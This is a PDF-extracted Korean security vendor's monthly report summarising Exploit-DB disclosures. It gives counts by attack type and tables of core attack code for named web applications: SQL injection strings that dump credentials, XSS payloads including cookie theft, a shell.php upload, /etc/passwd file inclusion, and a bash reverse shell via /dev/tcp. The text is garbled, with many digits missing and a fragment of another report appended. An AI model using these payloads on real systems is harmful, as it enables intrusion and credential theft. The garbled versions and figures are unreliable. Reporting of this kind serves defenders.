EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

Size: px

Start display at page:

Download "EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint"

예랑 삼
7 years ago
Views:

1 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한보고개수가가장많았으며공격유형도다양하게발견되었습니다. SQL Injection 공격은처음에는난이도가낮은공격이라도일단이발견되면해당을악용하여다양한공격을할수있는매우높은위험도를갖는공격에속합니다. SQL Injection 에노출되지않기위해서는입력값검증을엄격하게실시하는시큐어코딩이필수적으로요구되어집니다. 주요소프트웨어발생현황을보면, 0 월에는 CMS 부터 까지다양한소프트웨어에서이발견되었습니다. 이발견된소프트웨어를사용하는관리자는해당의내용을꼭확인하시고관련업데이트를실시하여에노출되지않도록주의하여야겠습니다.. 별보고개수 보고개수 Remote Command Execution File Upload LFI XSS SQL Injection 3 총합계 48 5 별보고개수 Remote Command ExecutionFile Upload LFI XSS SQL Injection. 위험도별분류위험도보고개수백분율 상 5 0.4% 중 % 총합계 % 위험도별분류 43 5 상 중 3. 공격난이도별현황 공격난이도 보고개수 백분율 상 % 중 % 하 % 총합계 % 공격난이도별현황 상 중 하 4. 주요소프트웨어별발생현황소프트웨어이름보고개수 Q3V 4 Image Business Rental Dynamic Web Picosafe Entrepreneur Job Portal Thatware Event Calendar Press Release Fashion School Full CBT FreePBX Application Health Record Witbe Ap MicroBlog Categorizator JonhCMS Rental Ap MicroCMS S9Y Serendipity CNDSOFT Learning Management Forum XhP CMS Student Information Advance MLM Web Based Alumni Tracking Syste OpenCimetiere Colorful Blog BB Portal miniblog MLM Unilevel Plan 총합계 48 주요소프트웨어별발생현황 4 Q3V Image Business Rental Dynamic Web Picosafe

2 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webinterface/js/filemanager/filemanage XSS 중 중 Picosafe Web Gui - r.php?directory=phnjcmlwdd5hbgvydcgxkts8l3njcmlwd Picosafe Web Picosafe filemanager.php XSS D4= Gui SQL Injection 하중 BB Portal - viewproduct.php SQL Injection /advancedbb/viewproduct.php?pid=94%7%0and%0754=754%0 AND%0%7whqn%7=%7whqn BB Portal BB Portal SQL Injection 하중 SQL Injection 중중 Rental - Blind SQL Injection Advance MLM - SQL Injection /product_details.php?refid=395887%7%0and% 039=39%0AND%0%7HTMi%7=%7HTMi /mlm/news_detail.php?newid=jmctrq%7%0union% 0ALL%0SELECT%0NULL,CONCAT(0x7787a7a7,0x b f c6e ,0x ),NULL,NULL,NULL,NULL--%0Afye Rental Advance MLM Rental Advance MLM SQL Injection 하중 SQL Injection 상상 - /jus/restaurants-details.php?fid=%0and%0=-- restaurants-details.php SQL Injection /news_detail.php?newid=%7%0%f*%30000an MLM Unilevel Plan v.0. d%0ascii%8substring%8%8database%8%9%9 - news_detail.php SQL Injection %C4%C%9%9%3C5%0and*%F%0%7x %7%3D%7x Clone MLM Unilevel Plan MLM Unilevel Plan v Remote Command Execution 중상 Witbe - Remote Code Execution POST /cgi-bin/applyconfig.pl HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Witbe Witbe file=set bash -i >& /dev/tcp/ 0>& XSS 하중 SQL Injection 상상 - /jus/restaurants-details.php?fid=<script>alert();</script> restaurants-details.php XXS /job-portal/jobsearch_all.html?cmpid= ' AND (SELECT 8347 FROM(SELECT Entrepreneur Job Portal - COUNT(*),CONCAT(0x76a7a7a7,(SELECT jobsearch_all.html SQL Injection (ELT(8347=8347,))),0x77876b7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjf'='tqjf Clone Entrepreneur Job Portal Entrepreneur Job Portal XSS 중중 miniblog.0. - admin.php XSS POST /miniblog/adm/admin.php?mode=add&id=%3cbr%0/% 3E%3Cb%3ENotice%3C/b%3E:%0%0Undefined%0 variable:%0post%0in%0%3cb%3ec:\\\\xampp \\\\htdocs\\\\miniblog\\\\adm\\\\edit.p hp%3c/b%3e%0on%0line%0%3cb%3e8%3c/b% 3E%3Cbr%0/%3E HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 miniblog miniblog.0. data[post_title]=<script>location.href = â +document.cookie;</script> XSS 하중 Press Release - administration.php XSS /phppressrelease/administration.php?pageaction=saverele ase&subaction=submit&dateday=&datemonthnewedit=&d ateyearnewedit=&title=<script>alert('exploit- DB')<%Fscript>&summary=deneme&releasebody=denem e&categorynewedit=&publish=active Press Release Press Release XSS 하중 Ap MicroBlog.0. - index.php XSS POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Ap MicroBlog Ap MicroBlog.0. task=publish_comment&article_id=69&user_id=&commen t_user_name=<script>alert(7);</script>&comment_user_e mail=besimweptest@yopmail.com&comment_text=besim& captcha_code=dkf8&btnsubmitpc=publish your comment

3 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST / HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ SQL Injection 하 중 OpenCimetiere v3.0.0-a5 - OpenCimetier OpenCimetier login.php SQL Injection e e v3.0.0-a5 login.action.connect=se%0connecter&came_from=&logi n=%0and%0=--&password=passw0rd XSS 하중 Ap MicroCMS index.php XSS POST /index.php?page=posts&post_id= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Ap MicroCMS Ap MicroCMS comment_user_name=<svg/onload=prompt(7);//> SQL Injection 하중 Categorizator vote.php SQL Injection /cms/categorizator/vote.php?id_site='%0and%0''=' ' Categorizator Categorizator XSS 하중 Colorful Blog - single.php XSS POST /single.php?kat=kat&url='post_name' HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Colorful Blog Colorful Blog adsoyad=<script>alert('document.cookie')</script>& = besim@yopmail.com&web=example.com&mesaj=nice, blog post SQL Injection 하중 XSS 하중.0 - /blog/admin.php?act=editpost&id='+order+by admin.php SQL Injection.0 - Multiple Vulnerabilities POST /blog/admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ act= addpost&publish_date= :30:7&post_title=<script>alert('XssPoC')</script>&post_ text=hacked&post_limit= SQL Injection 하 중 SQL Injection 하 중 SQL Injection 하 중 SQL Injection 하 중 JonhCMS go.php SQL /go.php?id=%0and%0=-- Injection Thatware friend.php SQL /friend.php?sid=%0and%0=-- Injection Forum.4 - /admin.php?act=editpost&id='+order+by admin.php SQL Injection POST /signin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Health Record 0. - Chrome/ Safari/535.7 signin.php SQL Injection JonhCMS Thatware Forum Health Record JonhCMS 4.5. Thatware Forum.4 Health Record SQL Injection 중중 SQL Injection 하중 Fashion 0. - dd.php SQL Injection Learning Management 0. - login.php SQL Injection lgaid=admin' or ''=' /admin/dd.php?q=- %7%0union%0select%0,version()--+ POST /admin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Fashion Fashion 0. Learning Management Learning Management 0. username=admin' or ''=' SQL Injection 중중 SQL Injection 중중 Dynamic Web 0. - page.php SQL Injection Web Based Alumni Tracking 0. - print_employed.php SQL Injection /page.php?prodid=- 3%7%0union%0select%0,,@@version,4--+ /admin/print_employed.php?id=- %7%0union%0select%0,concat(username,0x3a,p assword),3,4,5,6,7,8,9,0,,%0from%0user--+ Dynamic Web Web Based Alumni Tracking Dynamic Web 0. Web Based Alumni Tracking 0.

4 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 하중 POST /admin_login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Student Information Chrome/ Safari/535.7 (SIS) 0. - admin_login.php SQL Injection username=admin' or ''=' Student Information Student Information (SIS) XSS 하 중 XSS 하 중 XSS 하 중 SQL Injection 중 중 - index.php XSS - administration.php XSS Business - index.php XSS School Full CBT 0. - show.php SQL Injection /index.php?key=<svg/onload=alert()> /administration.php?key=<svg/onload=alert()> /index.php?key=<svg/onload=alert()>&location=<svg/onl oad=alert()> /show.php?show=- %0union%0select%0,username,password,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6,7, 8,user(),database(),3,3%0from%0adminlogin--+ Business School Full CBT Business School Full CBT SQL Injection 상 상 XSS 하 중 XSS 하 중 XSS 하 중 XSS 중 중 /shop/product-details.php?prodid=- 80%7%0union%0select%0,,concat(username,0x Application 0. - productdetails.php SQL Injection 3a,password),4,version(),user()%0from%0user--+ Image - index.php XSS Image - administration.php XSS Business - administration.php XSS XhP CMS action.php XSS /index.php?dateyear=<svg/onload=alert()>&key=<svg/onl oad=alert()> /administration.php?dateyear=<svg/onload=alert()>&key= <svg/onload=alert()> /administration.php?key=<svg/onload=alert()>&location= <svg/onload=alert()> POST /action.php?module=users&action=process_general_confi g&box_id=9&page_id=0&basename=index.php&closewin dow=&from_page=page=0&box_id=9&action=display_sit e_settings&errcode=0 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Application Image Image Business XhP CMS Application 0. Image Image Business XhP CMS 0.5. frmpagetitle="accesskeyzonclick"alert&# 40;document.domain File Upload 하중 CNDSOFT.3 - index.php File Upload POST /ofis/index.php?is=kullanici_tanimla HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f CNDSOFT CNDSOFT dd009908f Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream SQL Injection 하중 SQL Injection 상상 <? phpinfo();?> dd009908f-- /admin.php?act=options&cal_id='+order+by+0--+ Event Calendar.5 - admin.php SQL Injection Rental - viewproducts.php SQL Injection /viewproducts.php?catid=- 9700%7%0OR%0%0GROUP%0BY%0CONCAT (0x77a6707,(SELECT%0(CASE%0WHEN%0(7055 =7055)%0THEN%0%0ELSE%00%0END)),0x76a 76787,FLOOR(RAND(0)*))%0HAVING%0MIN(0)# Event Calendar Rental Event Calendar.5 Rental SQL Injection 하중 - categoryview-list.php SQL Injection 취약 /category-view-list.php?srch=%0and%0=-- 점 Clone

5 EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /admin/ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ LFI 하 중 FreePBX ajax.php LFI FreePBX FreePBX destination=/../../../../../../var/www/html/0x448.php&lan guage= XSS 하중 07 - form_process.php XSS POST /zenbership/pp-functions/form_process.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ page=&session=zen_076e737b450bbd83f5fc066&first _name=besim&last_name=<>alert('exploitdb')</scrip t>& =exploit@yopmail.com XSS 하중 07 - event-add.php XSS POST /admin/cp-functions/event-add.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/ event[name]=<>alert('meryem-exploitdb');</> XSS 하중 Q3V - FWUpgrade.php XSS POST /FWUpgrade.php HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="file"; filename="somefile.php<img src=x onerror=confirm()>" Content-Type: text/php Q3V Q3V t00t dd009908f XSS 하중 XSS 하중 Q3V - SensorDetails.php XSS Q3V - SNMP.php XSS /SensorDetails.php?Menu=SST&DeviceID=C00"><script>al ert()</script> POST /SNMP.php?Menu=SMP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/ Safari/535.7 Q3V Q3V Q3V Q3V SNMPAgent=Enable&CommuintyString=public&Commuint ywrite=private&trapsversion=vtrap&ip= ';a lert(3) LFI 하중 XSS 하중 Q3V - ListFile.php LFI /ListFile.php?file=../../../../../../../etc/passwd POST /serendipity_admin.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 S9Y Serendipity Chrome/ Safari/535.7 serendipity_admin.php XSS 취약 점 Q3V S9Y Serendipity Q3V S9Y Serendipity.0.4 serendipity[body]=<>alert('meryem ExploitDB')</>

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.